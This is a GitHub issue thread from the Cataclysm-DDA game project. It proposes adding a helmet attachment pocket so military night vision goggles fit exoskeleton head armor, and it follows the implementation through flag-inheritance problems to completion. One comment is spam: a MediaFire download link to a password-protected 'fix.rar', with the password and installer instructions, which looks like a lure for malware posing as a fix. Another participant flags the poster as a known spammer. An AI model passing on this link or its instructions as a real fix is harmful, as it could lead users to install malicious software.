### ISSUE TITLE
Allow military NVGs to be attached to exoskeleton head armor

### ISSUE THREAD

**Issue by Regilith** [CleverRaven/Cataclysm-DDA#75978]
### Is your feature request related to a problem? Please describe.

Military night vision goggles were recently made to only be usable when attached to military helmets with the proper mounts. Considering exoskeletons were developed by the military and made to be modular, it seems like an oversight that the suits would not be able to use this technology.

It makes sense to have an option for soldiers to see in the dark while in an exoskeleton, without relying on CBMs, either with a custom/proprietary solution, having it be built-in to the exoskeleton, or by using the preexisting NVGs. 

### Solution you would like.

Add a `HELMET_FRONT_ATTACHMENT` pocket to the exoskeleton head armors.

### Describe alternatives you have considered.

Suffer in the dark days.

### Additional context

I will tinker with an implementation unless there's pushback to the idea.

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by HadeanLake** [comment]
Pinging @NetSysFire as they requested to be pinged when unhidden comment of this spammer spotted

**Comment by Regilith** [comment]
Added the pocket to test it out, inserted goggles do not apply the enchantment to the player. I suspect that relic_data is not being inherited due to the goggles being in a pocket-within-a-pocket.

**Comment by Hyperseeker** [comment]
> I suspect that relic_data is not being inherited due to the goggles being in a pocket-within-a-pocket.

Is this true even when both of the pockets have `inherit_flags` set to `true`?

**Comment by Regilith** [comment]
Setting `inherit_flags` to `true` on the exoskeleton pocket and head armor pocket does not work. I don't believe the `relic_data` is a flag, it just applies the NVG enchantment.

**Comment by Regilith** [comment]
I have implemented this feature, closing issue
